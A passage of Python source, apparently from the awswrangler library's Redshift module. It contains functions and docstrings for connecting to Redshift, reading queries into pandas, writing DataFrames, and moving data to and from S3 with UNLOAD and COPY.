" f"Currently value: {key}" ) def _redshift_types_from_path( path: Optional[Union[str, List[str]]], varchar_lengths_default: int, varchar_lengths: Optional[Dict[str, int]], parquet_infer_sampling: float, path_suffix: Optional[str], path_ignore_suffix: Optional[str], use_threads: Union[bool, int], boto3_session: Optional[boto3.Session], s3_additional_kwargs: Optional[Dict[str, str]], ) -> Dict[str, str]: """Extract Redshift data types from a Pandas DataFrame.""" _varchar_lengths: Dict[str, int] = {} if varchar_lengths is None else varchar_lengths session: boto3.Session = _utils.ensure_session(session=boto3_session) _logger.debug("Scanning parquet schemas on s3...") athena_types, _ = s3.read_parquet_metadata( path=path, sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, dataset=False, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) _logger.debug("athena_types: %s", athena_types) redshift_types: Dict[str, str] = {} for col_name, col_type in athena_types.items(): length: int = _varchar_lengths[col_name] if col_name in _varchar_lengths else varchar_lengths_default redshift_types[col_name] = _data_types.athena2redshift(dtype=col_type, varchar_length=length) return redshift_types def _create_table( # pylint: disable=too-many-locals,too-many-arguments df: Optional[pd.DataFrame], path: Optional[Union[str, List[str]]], con: redshift_connector.Connection, cursor: redshift_connector.Cursor, table: str, schema: str, mode: str, overwrite_method: str, index: bool, dtype: Optional[Dict[str, str]], diststyle: str, sortstyle: str, distkey: Optional[str], sortkey: Optional[List[str]], primary_keys: Optional[List[str]], varchar_lengths_default: int, varchar_lengths: Optional[Dict[str, int]], parquet_infer_sampling: float = 1.0, path_suffix: Optional[str] = None, path_ignore_suffix: Optional[str] = None, use_threads: Union[bool, int] = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> Tuple[str, Optional[str]]: if mode == "overwrite": if overwrite_method == "truncate": try: # Truncate commits current transaction, if successful. # Fast, but not atomic. _truncate_table(cursor=cursor, schema=schema, table=table) except redshift_connector.error.ProgrammingError as e: # Caught "relation does not exist". if e.args[0]["C"] != "42P01": # pylint: disable=invalid-sequence-index raise e _logger.debug(str(e)) con.rollback() _begin_transaction(cursor=cursor) elif overwrite_method == "delete": if _does_table_exist(cursor=cursor, schema=schema, table=table): # Atomic, but slow. _delete_all(cursor=cursor, schema=schema, table=table) else: # Fast, atomic, but either fails if there are any dependent views or, in cascade mode, deletes them. 
                _drop_table(cursor=cursor, schema=schema, table=table, cascade=bool(overwrite_method == "cascade"))
    elif _does_table_exist(cursor=cursor, schema=schema, table=table) is True:
        if mode == "upsert":
            guid: str = uuid.uuid4().hex
            temp_table: str = f"temp_redshift_{guid}"
            sql: str = f'CREATE TEMPORARY TABLE {temp_table} (LIKE "{schema}"."{table}")'
            _logger.debug(sql)
            cursor.execute(sql)
            return temp_table, None
        return table, schema
    diststyle = diststyle.upper() if diststyle else "AUTO"
    sortstyle = sortstyle.upper() if sortstyle else "COMPOUND"
    if df is not None:
        redshift_types: Dict[str, str] = _data_types.database_types_from_pandas(
            df=df,
            index=index,
            dtype=dtype,
            varchar_lengths_default=varchar_lengths_default,
            varchar_lengths=varchar_lengths,
            converter_func=_data_types.pyarrow2redshift,
        )
    elif path is not None:
        redshift_types = _redshift_types_from_path(
            path=path,
            varchar_lengths_default=varchar_lengths_default,
            varchar_lengths=varchar_lengths,
            parquet_infer_sampling=parquet_infer_sampling,
            path_suffix=path_suffix,
            path_ignore_suffix=path_ignore_suffix,
            use_threads=use_threads,
            boto3_session=boto3_session,
            s3_additional_kwargs=s3_additional_kwargs,
        )
    else:
        raise ValueError("df and path are None. You MUST pass at least one.")
    _validate_parameters(
        redshift_types=redshift_types,
        diststyle=diststyle,
        distkey=distkey,
        sortstyle=sortstyle,
        sortkey=sortkey,
    )
    cols_str: str = "".join([f"{k} {v},\n" for k, v in redshift_types.items()])[:-2]
    primary_keys_str: str = f",\nPRIMARY KEY ({', '.join(primary_keys)})" if primary_keys else ""
    distkey_str: str = f"\nDISTKEY({distkey})" if distkey and diststyle == "KEY" else ""
    sortkey_str: str = f"\n{sortstyle} SORTKEY({','.join(sortkey)})" if sortkey else ""
    sql = (
        f'CREATE TABLE IF NOT EXISTS "{schema}"."{table}" (\n'
        f"{cols_str}"
        f"{primary_keys_str}"
        f")\nDISTSTYLE {diststyle}"
        f"{distkey_str}"
        f"{sortkey_str}"
    )
    _logger.debug("Create table query:\n%s", sql)
    cursor.execute(sql)
    return table, schema


def _read_parquet_iterator(
    path: str,
    keep_files: bool,
    use_threads: Union[bool, int],
    categories: Optional[List[str]],
    chunked: Union[bool, int],
    boto3_session: Optional[boto3.Session],
    s3_additional_kwargs: Optional[Dict[str, str]],
) -> Iterator[pd.DataFrame]:
    dfs: Iterator[pd.DataFrame] = s3.read_parquet(
        path=path,
        categories=categories,
        chunked=chunked,
        dataset=False,
        use_threads=use_threads,
        boto3_session=boto3_session,
        s3_additional_kwargs=s3_additional_kwargs,
    )
    yield from dfs
    if keep_files is False:
        s3.delete_objects(
            path=path, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs
        )


def connect(
    connection: Optional[str] = None,
    secret_id: Optional[str] = None,
    catalog_id: Optional[str] = None,
    dbname: Optional[str] = None,
    boto3_session: Optional[boto3.Session] = None,
    ssl: bool = True,
    timeout: Optional[int] = None,
    max_prepared_statements: int = 1000,
    tcp_keepalive: bool = True,
) -> redshift_connector.Connection:
    """Return a redshift_connector connection from a Glue Catalog or Secret Manager.

    Note
    ----
    You MUST pass a `connection` OR `secret_id`.
    Here is an example of the secret structure in Secrets Manager:
    {
    "host":"my-host.us-east-1.redshift.amazonaws.com",
    "username":"test",
    "password":"test",
    "engine":"redshift",
    "port":"5439",
    "dbname": "mydb"
    }

    https://github.com/aws/amazon-redshift-python-driver

    Parameters
    ----------
    connection : Optional[str]
        Glue Catalog Connection name.
    secret_id: Optional[str]:
        Specifies the secret containing the connection details that you want to retrieve.
        You can specify either the Amazon Resource Name (ARN) or the friendly name of the secret.
    catalog_id : str, optional
        The ID of the Data Catalog.
        If none is provided, the AWS account ID is used by default.
    dbname : Optional[str]
        Optional database name to overwrite the stored one.
    boto3_session : boto3.Session(), optional
        Boto3 Session. The default boto3 session will be used if boto3_session receives None.
    ssl : bool
        This governs SSL encryption for TCP/IP sockets.
        This parameter is forwarded to redshift_connector.
        https://github.com/aws/amazon-redshift-python-driver
    timeout : Optional[int]
        This is the time in seconds before the connection to the server will time out.
        The default is None which means no timeout.
        This parameter is forwarded to redshift_connector.
        https://github.com/aws/amazon-redshift-python-driver
    max_prepared_statements : int
        This parameter is forwarded to redshift_connector.
        https://github.com/aws/amazon-redshift-python-driver
    tcp_keepalive : bool
        If True then use TCP keepalive. The default is True.
        This parameter is forwarded to redshift_connector.
        https://github.com/aws/amazon-redshift-python-driver

    Returns
    -------
    redshift_connector.Connection
        redshift_connector connection.

    Examples
    --------
    Fetching Redshift connection from Glue Catalog

    >>> import awswrangler as wr
    >>> con = wr.redshift.connect("MY_GLUE_CONNECTION")
    >>> with con.cursor() as cursor:
    >>>     cursor.execute("SELECT 1")
    >>>     print(cursor.fetchall())
    >>> con.close()

    Fetching Redshift connection from Secrets Manager

    >>> import awswrangler as wr
    >>> con = wr.redshift.connect(secret_id="MY_SECRET")
    >>> with con.cursor() as cursor:
    >>>     cursor.execute("SELECT 1")
    >>>     print(cursor.fetchall())
    >>> con.close()

    """
    attrs: _db_utils.ConnectionAttributes = _db_utils.get_connection_attributes(
        connection=connection, secret_id=secret_id, catalog_id=catalog_id, dbname=dbname, boto3_session=boto3_session
    )
    if attrs.kind != "redshift":
        raise exceptions.InvalidDatabaseType(
            f"Invalid connection type ({attrs.kind}). It must be a redshift connection."
        )
    return redshift_connector.connect(
        user=attrs.user,
        database=attrs.database,
        password=attrs.password,
        port=int(attrs.port),
        host=attrs.host,
        ssl=ssl,
        timeout=timeout,
        max_prepared_statements=max_prepared_statements,
        tcp_keepalive=tcp_keepalive,
    )


def connect_temp(
    cluster_identifier: str,
    user: str,
    database: Optional[str] = None,
    duration: int = 900,
    auto_create: bool = True,
    db_groups: Optional[List[str]] = None,
    boto3_session: Optional[boto3.Session] = None,
    ssl: bool = True,
    timeout: Optional[int] = None,
    max_prepared_statements: int = 1000,
    tcp_keepalive: bool = True,
) -> redshift_connector.Connection:
    """Return a redshift_connector temporary connection (No password required).

    https://github.com/aws/amazon-redshift-python-driver

    Parameters
    ----------
    cluster_identifier : str
        The unique identifier of a cluster.
        This parameter is case sensitive.
    user : str
        The name of a database user.
    database : str, optional
        Database name. If None, the default Database is used.
    duration : int, optional
        The number of seconds until the returned temporary password expires.
        Constraint: minimum 900, maximum 3600.
        Default: 900
    auto_create : bool
        Create a database user with the name specified for the user named in user if one does not exist.
    db_groups : List[str], optional
        A list of the names of existing database groups that the user named in user will join for the current session,
        in addition to any group memberships for an existing user. If not specified, a new user is added only to PUBLIC.
    boto3_session : boto3.Session(), optional
        Boto3 Session. The default boto3 session will be used if boto3_session receives None.
    ssl : bool
        This governs SSL encryption for TCP/IP sockets.
        This parameter is forwarded to redshift_connector.
        https://github.com/aws/amazon-redshift-python-driver
    timeout : Optional[int]
        This is the time in seconds before the connection to the server will time out.
        The default is None which means no timeout.
        This parameter is forwarded to redshift_connector.
        https://github.com/aws/amazon-redshift-python-driver
    max_prepared_statements : int
        This parameter is forwarded to redshift_connector.
        https://github.com/aws/amazon-redshift-python-driver
    tcp_keepalive : bool
        If True then use TCP keepalive. The default is True.
        This parameter is forwarded to redshift_connector.
        https://github.com/aws/amazon-redshift-python-driver

    Returns
    -------
    redshift_connector.Connection
        redshift_connector connection.

    Examples
    --------
    >>> import awswrangler as wr
    >>> con = wr.redshift.connect_temp(cluster_identifier="my-cluster", user="test")
    >>> with con.cursor() as cursor:
    >>>     cursor.execute("SELECT 1")
    >>>     print(cursor.fetchall())
    >>> con.close()

    """
    client_redshift: boto3.client = _utils.client(service_name="redshift", session=boto3_session)
    args: Dict[str, Any] = {
        "DbUser": user,
        "ClusterIdentifier": cluster_identifier,
        "DurationSeconds": duration,
        "AutoCreate": auto_create,
    }
    if db_groups is not None:
        args["DbGroups"] = db_groups
    else:
        db_groups = []
    res: Dict[str, Any] = client_redshift.get_cluster_credentials(**args)
    cluster: Dict[str, Any] = client_redshift.describe_clusters(ClusterIdentifier=cluster_identifier)["Clusters"][0]
    return redshift_connector.connect(
        user=res["DbUser"],
        database=database if database else cluster["DBName"],
        password=res["DbPassword"],
        port=cluster["Endpoint"]["Port"],
        host=cluster["Endpoint"]["Address"],
        ssl=ssl,
        timeout=timeout,
        max_prepared_statements=max_prepared_statements,
        tcp_keepalive=tcp_keepalive,
        db_groups=db_groups,
    )


def read_sql_query(
    sql: str,
    con: redshift_connector.Connection,
    index_col: Optional[Union[str, List[str]]] = None,
    params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None,
    chunksize: Optional[int] = None,
    dtype: Optional[Dict[str, pa.DataType]] = None,
    safe: bool = True,
) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]:
    """Return a DataFrame corresponding to the result set of the query string.

    Note
    ----
    For large extractions (1K+ rows) consider the function **wr.redshift.unload()**.

    Parameters
    ----------
    sql : str
        SQL query.
    con : redshift_connector.Connection
        Use redshift_connector.connect() to use credentials directly or
        wr.redshift.connect() to fetch it from the Glue Catalog.
    index_col : Union[str, List[str]], optional
        Column(s) to set as index(MultiIndex).
    params : Union[List, Tuple, Dict], optional
        List of parameters to pass to execute method.
        The syntax used to pass parameters is database driver dependent.
        Check your database driver documentation for which of the five syntax styles,
        described in PEP 249’s paramstyle, is supported.
    chunksize : int, optional
        If specified, return an iterator where chunksize is the number of rows to include in each chunk.
    dtype : Dict[str, pyarrow.DataType], optional
        Specifying the datatype for columns.
        The keys should be the column names and the values should be the PyArrow types.
    safe : bool
        Check for overflows or other unsafe data type conversions.

    Returns
    -------
    Union[pandas.DataFrame, Iterator[pandas.DataFrame]]
        Result as Pandas DataFrame(s).

    Examples
    --------
    Reading from Redshift using a Glue Catalog Connection

    >>> import awswrangler as wr
    >>> con = wr.redshift.connect("MY_GLUE_CONNECTION")
    >>> df = wr.redshift.read_sql_query(
    ...     sql="SELECT * FROM public.my_table",
    ...     con=con
    ... )
    >>> con.close()

    """
    _validate_connection(con=con)
    return _db_utils.read_sql_query(
        sql=sql, con=con, index_col=index_col, params=params, chunksize=chunksize, dtype=dtype, safe=safe
    )


def read_sql_table(
    table: str,
    con: redshift_connector.Connection,
    schema: Optional[str] = None,
    index_col: Optional[Union[str, List[str]]] = None,
    params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None,
    chunksize: Optional[int] = None,
    dtype: Optional[Dict[str, pa.DataType]] = None,
    safe: bool = True,
) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]:
    """Return a DataFrame corresponding to the table.

    Note
    ----
    For large extractions (1K+ rows) consider the function **wr.redshift.unload()**.

    Parameters
    ----------
    table : str
        Table name.
    con : redshift_connector.Connection
        Use redshift_connector.connect() to use credentials directly or
        wr.redshift.connect() to fetch it from the Glue Catalog.
    schema : str, optional
        Name of SQL schema in database to query (if database flavor supports this).
        Uses default schema if None (default).
    index_col : Union[str, List[str]], optional
        Column(s) to set as index(MultiIndex).
    params : Union[List, Tuple, Dict], optional
        List of parameters to pass to execute method.
        The syntax used to pass parameters is database driver dependent.
        Check your database driver documentation for which of the five syntax styles,
        described in PEP 249’s paramstyle, is supported.
    chunksize : int, optional
        If specified, return an iterator where chunksize is the number of rows to include in each chunk.
    dtype : Dict[str, pyarrow.DataType], optional
        Specifying the datatype for columns.
        The keys should be the column names and the values should be the PyArrow types.
    safe : bool
        Check for overflows or other unsafe data type conversions.

    Returns
    -------
    Union[pandas.DataFrame, Iterator[pandas.DataFrame]]
        Result as Pandas DataFrame(s).

    Examples
    --------
    Reading from Redshift using a Glue Catalog Connection

    >>> import awswrangler as wr
    >>> con = wr.redshift.connect("MY_GLUE_CONNECTION")
    >>> df = wr.redshift.read_sql_table(
    ...     table="my_table",
    ...     schema="public",
    ...     con=con
    ... )
    >>> con.close()

    """
    sql: str = f'SELECT * FROM "{table}"' if schema is None else f'SELECT * FROM "{schema}"."{table}"'
    return read_sql_query(
        sql=sql, con=con, index_col=index_col, params=params, chunksize=chunksize, dtype=dtype, safe=safe
    )


@apply_configs
def to_sql(  # pylint: disable=too-many-locals
    df: pd.DataFrame,
    con: redshift_connector.Connection,
    table: str,
    schema: str,
    mode: str = "append",
    overwrite_method: str = "drop",
    index: bool = False,
    dtype: Optional[Dict[str, str]] = None,
    diststyle: str = "AUTO",
    distkey: Optional[str] = None,
    sortstyle: str = "COMPOUND",
    sortkey: Optional[List[str]] = None,
    primary_keys: Optional[List[str]] = None,
    varchar_lengths_default: int = 256,
    varchar_lengths: Optional[Dict[str, int]] = None,
    use_column_names: bool = False,
    lock: bool = False,
    chunksize: int = 200,
    commit_transaction: bool = True,
) -> None:
    """Write records stored in a DataFrame into Redshift.

    Note
    ----
    For large DataFrames (1K+ rows) consider the function **wr.redshift.copy()**.

    Parameters
    ----------
    df : pandas.DataFrame
        Pandas DataFrame https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html
    con : redshift_connector.Connection
        Use redshift_connector.connect() to use credentials directly or
        wr.redshift.connect() to fetch it from the Glue Catalog.
    table : str
        Table name
    schema : str
        Schema name
    mode : str
        Append, overwrite or upsert.
    overwrite_method : str
        Drop, cascade, truncate, or delete. Only applicable in overwrite mode.

        "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it.
        "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it.
        "truncate" - ``TRUNCATE ...`` - truncates the table, but immediately commits the current
        transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic.
        "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods.
    index : bool
        True to store the DataFrame index as a column in the table,
        otherwise False to ignore it.
    dtype : Dict[str, str], optional
        Dictionary of column names and Redshift types to be cast.
        Useful when you have columns with undetermined or mixed data types.
        (e.g. {'col name': 'VARCHAR(10)', 'col2 name': 'FLOAT'})
    diststyle : str
        Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"].
        https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html
    distkey : str, optional
        Specifies a column name or positional number for the distribution key.
    sortstyle : str
        Sorting can be "COMPOUND" or "INTERLEAVED".
        https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html
    sortkey : List[str], optional
        List of columns to be sorted.
    primary_keys : List[str], optional
        Primary keys.
    varchar_lengths_default : int
        The size that will be set for all VARCHAR columns not specified with varchar_lengths.
    varchar_lengths : Dict[str, int], optional
        Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}).
    use_column_names : bool
        If set to True, will use the column names of the DataFrame for generating the INSERT SQL Query.
        E.g. If the DataFrame has two columns `col1` and `col3` and `use_column_names` is True, data will only be
        inserted into the database columns `col1` and `col3`.
    lock : bool
        True to execute LOCK command inside the transaction to force serializable isolation.
    chunksize : int
        Number of rows which are inserted with each SQL query. Defaults to inserting 200 rows per query.
    commit_transaction : bool
        Whether to commit the transaction. True by default.

    Returns
    -------
    None
        None.

    Examples
    --------
    Writing to Redshift using a Glue Catalog Connection

    >>> import awswrangler as wr
    >>> con = wr.redshift.connect("MY_GLUE_CONNECTION")
    >>> wr.redshift.to_sql(
    ...     df=df,
    ...     table="my_table",
    ...     schema="public",
    ...     con=con
    ... )
    >>> con.close()

    """
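    # The whole write runs inside one explicit transaction: autocommit is
    # disabled, rows are inserted in chunks, and any failure triggers a rollback.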
    if df.empty is True:
        raise exceptions.EmptyDataFrame()
    _validate_connection(con=con)
    autocommit_temp: bool = con.autocommit
    con.autocommit = False
    try:
        with con.cursor() as cursor:
            created_table, created_schema = _create_table(
                df=df,
                path=None,
                con=con,
                cursor=cursor,
                table=table,
                schema=schema,
                mode=mode,
                overwrite_method=overwrite_method,
                index=index,
                dtype=dtype,
                diststyle=diststyle,
                sortstyle=sortstyle,
                distkey=distkey,
                sortkey=sortkey,
                primary_keys=primary_keys,
                varchar_lengths_default=varchar_lengths_default,
                varchar_lengths=varchar_lengths,
            )
            if index:
                df.reset_index(level=df.index.names, inplace=True)
            column_placeholders: str = ", ".join(["%s"] * len(df.columns))
            schema_str = f'"{created_schema}".' if created_schema else ""
            insertion_columns = ""
            if use_column_names:
                insertion_columns = f"({', '.join(df.columns)})"
            placeholder_parameter_pair_generator = _db_utils.generate_placeholder_parameter_pairs(
                df=df, column_placeholders=column_placeholders, chunksize=chunksize
            )
            for placeholders, parameters in placeholder_parameter_pair_generator:
                sql: str = f'INSERT INTO {schema_str}"{created_table}" {insertion_columns} VALUES {placeholders}'
                _logger.debug("sql: %s", sql)
                cursor.executemany(sql, (parameters,))
            if table != created_table:  # upsert
                if lock:
                    _lock(cursor, [table], schema=schema)
                _upsert(cursor=cursor, schema=schema, table=table, temp_table=created_table, primary_keys=primary_keys)
            if commit_transaction:
                con.commit()
    except Exception as ex:
        con.rollback()
        _logger.error(ex)
        raise
    finally:
        con.autocommit = autocommit_temp


def unload_to_files(
    sql: str,
    path: str,
    con: redshift_connector.Connection,
    iam_role: Optional[str] = None,
    aws_access_key_id: Optional[str] = None,
    aws_secret_access_key: Optional[str] = None,
    aws_session_token: Optional[str] = None,
    region: Optional[str] = None,
    unload_format: Optional[str] = None,
    max_file_size: Optional[float] = None,
    kms_key_id: Optional[str] = None,
    manifest: bool = False,
    partition_cols: Optional[List[str]] = None,
    boto3_session: Optional[boto3.Session] = None,
) -> None:
    """Unload Parquet files on S3 from a Redshift query result (through the UNLOAD command).

    https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html

    Note
    ----
    If `use_threads=True`, the number of threads that will be spawned is obtained from os.cpu_count().

    Parameters
    ----------
    sql : str
        SQL query.
    path : str
        S3 path to write stage files (e.g. s3://bucket_name/any_name/)
    con : redshift_connector.Connection
        Use redshift_connector.connect() to use credentials directly or
        wr.redshift.connect() to fetch it from the Glue Catalog.
    iam_role : str, optional
        AWS IAM role with the related permissions.
    aws_access_key_id : str, optional
        The access key for your AWS account.
    aws_secret_access_key : str, optional
        The secret key for your AWS account.
    aws_session_token : str, optional
        The session key for your AWS account. This is only needed when you are using temporary credentials.
    region : str, optional
        Specifies the AWS Region where the target Amazon S3 bucket is located.
        REGION is required for UNLOAD to an Amazon S3 bucket that isn't in the
        same AWS Region as the Amazon Redshift cluster. By default, UNLOAD
        assumes that the target Amazon S3 bucket is located in the same AWS
        Region as the Amazon Redshift cluster.
    unload_format : str, optional
        Format of the unloaded S3 objects from the query.
        Valid values: "CSV", "PARQUET". Case sensitive. Defaults to PARQUET.
    max_file_size : float, optional
        Specifies the maximum size (MB) of files that UNLOAD creates in Amazon S3.
        Specify a decimal value between 5.0 MB and 6200.0 MB.
        If None, the default maximum file size is 6200.0 MB.
    kms_key_id : str, optional
        Specifies the key ID for an AWS Key Management Service (AWS KMS) key to be
        used to encrypt data files on Amazon S3.
    manifest : bool
        Unload a manifest file on S3.
    partition_cols : List[str], optional
        Specifies the partition keys for the unload operation.
    boto3_session : boto3.Session(), optional
        Boto3 Session. The default boto3 session will be used if boto3_session receives None.

    Returns
    -------
    None

    Examples
    --------
    >>> import awswrangler as wr
    >>> con = wr.redshift.connect("MY_GLUE_CONNECTION")
    >>> wr.redshift.unload_to_files(
    ...     sql="SELECT * FROM public.mytable",
    ...     path="s3://bucket/extracted_parquet_files/",
    ...     con=con,
    ...     iam_role="arn:aws:iam::XXX:role/XXX"
    ... )
    >>> con.close()

    """
    if unload_format not in [None, "CSV", "PARQUET"]:
        raise exceptions.InvalidArgumentValue("<unload_format> argument must be 'CSV' or 'PARQUET'")
    session: boto3.Session = _utils.ensure_session(session=boto3_session)
    with con.cursor() as cursor:
        format_str: str = unload_format or "PARQUET"
        partition_str: str = f"\nPARTITION BY ({','.join(partition_cols)})" if partition_cols else ""
        manifest_str: str = "\nmanifest" if manifest is True else ""
        region_str: str = f"\nREGION AS '{region}'" if region is not None else ""
        max_file_size_str: str = f"\nMAXFILESIZE AS {max_file_size} MB" if max_file_size is not None else ""
        kms_key_id_str: str = f"\nKMS_KEY_ID '{kms_key_id}'" if kms_key_id is not None else ""
        auth_str: str = _make_s3_auth_string(
            iam_role=iam_role,
            aws_access_key_id=aws_access_key_id,
            aws_secret_access_key=aws_secret_access_key,
            aws_session_token=aws_session_token,
            boto3_session=session,
        )
        sql = (
            f"UNLOAD ('{sql}')\n"
            f"TO '{path}'\n"
            f"{auth_str}"
            "ALLOWOVERWRITE\n"
            "PARALLEL ON\n"
            f"FORMAT {format_str}\n"
            "ENCRYPTED"
            f"{kms_key_id_str}"
            f"{partition_str}"
            f"{region_str}"
            f"{max_file_size_str}"
            f"{manifest_str};"
        )
        _logger.debug("sql: \n%s", sql)
        cursor.execute(sql)


def unload(
    sql: str,
    path: str,
    con: redshift_connector.Connection,
    iam_role: Optional[str] = None,
    aws_access_key_id: Optional[str] = None,
    aws_secret_access_key: Optional[str] = None,
    aws_session_token: Optional[str] = None,
    region: Optional[str] = None,
    max_file_size: Optional[float] = None,
    kms_key_id: Optional[str] = None,
    categories: Optional[List[str]] = None,
    chunked: Union[bool, int] = False,
    keep_files: bool = False,
    use_threads: Union[bool, int] = True,
    boto3_session: Optional[boto3.Session] = None,
    s3_additional_kwargs: Optional[Dict[str, str]] = None,
) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]:
    """Load Pandas DataFrame from an Amazon Redshift query result using Parquet files on S3 as stage.

    This is a **HIGH** latency and **HIGH** throughput alternative to
    `wr.redshift.read_sql_query()`/`wr.redshift.read_sql_table()` to extract large
    Amazon Redshift data into Pandas DataFrames through the **UNLOAD command**.

    This strategy has more overhead and requires more IAM privileges
    than the regular `wr.redshift.read_sql_query()`/`wr.redshift.read_sql_table()` function,
    so it is only recommended when fetching 1k+ rows at once.

    https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD.html

    Note
    ----
    ``Batching`` (`chunked` argument) (Memory Friendly):

    Will enable the function to return an Iterable of DataFrames instead of a regular DataFrame.

    There are two batching strategies on Wrangler:

    - If **chunked=True**, a new DataFrame will be returned for each file in your path/dataset.

    - If **chunked=INTEGER**, Wrangler will iterate on the data by number of rows (equal to the received INTEGER).

    `P.S.` `chunked=True` is faster and uses less memory while `chunked=INTEGER` is more precise
    in the number of rows for each DataFrame.

    Note
    ----
    If `use_threads=True`, the number of threads that will be spawned is obtained from os.cpu_count().

    Parameters
    ----------
    sql : str
        SQL query.
    path : str
        S3 path to write stage files (e.g. s3://bucket_name/any_name/)
    con : redshift_connector.Connection
        Use redshift_connector.connect() to use credentials directly or
        wr.redshift.connect() to fetch it from the Glue Catalog.
    iam_role : str, optional
        AWS IAM role with the related permissions.
    aws_access_key_id : str, optional
        The access key for your AWS account.
    aws_secret_access_key : str, optional
        The secret key for your AWS account.
    aws_session_token : str, optional
        The session key for your AWS account. This is only needed when you are using temporary credentials.
    region : str, optional
        Specifies the AWS Region where the target Amazon S3 bucket is located.
        REGION is required for UNLOAD to an Amazon S3 bucket that isn't in the
        same AWS Region as the Amazon Redshift cluster. By default, UNLOAD
        assumes that the target Amazon S3 bucket is located in the same AWS
        Region as the Amazon Redshift cluster.
    max_file_size : float, optional
        Specifies the maximum size (MB) of files that UNLOAD creates in Amazon S3.
        Specify a decimal value between 5.0 MB and 6200.0 MB.
        If None, the default maximum file size is 6200.0 MB.
    kms_key_id : str, optional
        Specifies the key ID for an AWS Key Management Service (AWS KMS) key to be
        used to encrypt data files on Amazon S3.
    categories : List[str], optional
        List of column names that should be returned as pandas.Categorical.
        Recommended for memory restricted environments.
    keep_files : bool
        Whether to keep stage files.
    chunked : Union[int, bool]
        If passed will split the data into an Iterable of DataFrames (memory friendly).
        If `True` wrangler will iterate on the data by files in the most efficient way without guarantee of chunksize.
        If an `INTEGER` is passed Wrangler will iterate on the data by number of rows equal to the received INTEGER.
    use_threads : bool, int
        True to enable concurrent requests, False to disable multiple threads.
        If enabled os.cpu_count() will be used as the max number of threads.
        If integer is provided, specified number is used.
    boto3_session : boto3.Session(), optional
        Boto3 Session. The default boto3 session will be used if boto3_session receives None.
    s3_additional_kwargs : Dict[str, str], optional
        Forwarded to botocore requests, only "SSECustomerAlgorithm" and "SSECustomerKey" arguments will be considered.

    Returns
    -------
    Union[pandas.DataFrame, Iterator[pandas.DataFrame]]
        Result as Pandas DataFrame(s).

    Examples
    --------
    >>> import awswrangler as wr
    >>> con = wr.redshift.connect("MY_GLUE_CONNECTION")
    >>> df = wr.redshift.unload(
    ...     sql="SELECT * FROM public.mytable",
    ...     path="s3://bucket/extracted_parquet_files/",
    ...     con=con,
    ...     iam_role="arn:aws:iam::XXX:role/XXX"
    ... )
    >>> con.close()

    """
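    # Two-step flow: UNLOAD the query result to Parquet files on S3, then read
    # those files back into pandas (stage files are deleted unless keep_files=True).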
    path = path if path.endswith("/") else f"{path}/"
    session: boto3.Session = _utils.ensure_session(session=boto3_session)
    unload_to_files(
        sql=sql,
        path=path,
        con=con,
        iam_role=iam_role,
        aws_access_key_id=aws_access_key_id,
        aws_secret_access_key=aws_secret_access_key,
        aws_session_token=aws_session_token,
        region=region,
        max_file_size=max_file_size,
        kms_key_id=kms_key_id,
        manifest=False,
        boto3_session=session,
    )
    if chunked is False:
        df: pd.DataFrame = s3.read_parquet(
            path=path,
            categories=categories,
            chunked=chunked,
            dataset=False,
            use_threads=use_threads,
            boto3_session=session,
            s3_additional_kwargs=s3_additional_kwargs,
        )
        if keep_files is False:
            s3.delete_objects(
                path=path, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs
            )
        return df
    return _read_parquet_iterator(
        path=path,
        categories=categories,
        chunked=chunked,
        use_threads=use_threads,
        boto3_session=session,
        s3_additional_kwargs=s3_additional_kwargs,
        keep_files=keep_files,
    )


def copy_from_files(  # pylint: disable=too-many-locals,too-many-arguments
    path: str,
    con: redshift_connector.Connection,
    table: str,
    schema: str,
    iam_role: Optional[str] = None,
    aws_access_key_id: Optional[str] = None,
    aws_secret_access_key: Optional[str] = None,
    aws_session_token: Optional[str] = None,
    parquet_infer_sampling: float = 1.0,
    mode: str = "append",
    overwrite_method: str = "drop",
    diststyle: str = "AUTO",
    distkey: Optional[str] = None,
    sortstyle: str = "COMPOUND",
    sortkey: Optional[List[str]] = None,
    primary_keys: Optional[List[str]] = None,
    varchar_lengths_default: int = 256,
    varchar_lengths: Optional[Dict[str, int]] = None,
    serialize_to_json: bool = False,
    path_suffix: Optional[str] = None,
    path_ignore_suffix: Optional[str] = None,
    use_threads: Union[bool, int] = True,
    lock: bool = False,
    commit_transaction: bool = True,
    boto3_session: Optional[boto3.Session] = None,
    s3_additional_kwargs: Optional[Dict[str, str]] = None,
) -> None:
    """Load Parquet files from S3 to a Table on Amazon Redshift (through the COPY command).

    https://docs.aws.amazon.com/redshift/latest/dg/r_COPY.html

    Note
    ----
    If the table does not exist yet, it will be automatically created for you
    using the Parquet metadata to infer the columns data types.

    Note
    ----
    If `use_threads=True`, the number of threads that will be spawned is obtained from os.cpu_count().

    Parameters
    ----------
    path : str
        S3 prefix (e.g. s3://bucket/prefix/)
    con : redshift_connector.Connection
        Use redshift_connector.connect() to use credentials directly or
        wr.redshift.connect() to fetch it from the Glue Catalog.
    table : str
        Table name
    schema : str
        Schema name
    iam_role : str, optional
        AWS IAM role with the related permissions.
    aws_access_key_id : str, optional
        The access key for your AWS account.
    aws_secret_access_key : str, optional
        The secret key for your AWS account.
    aws_session_token : str, optional
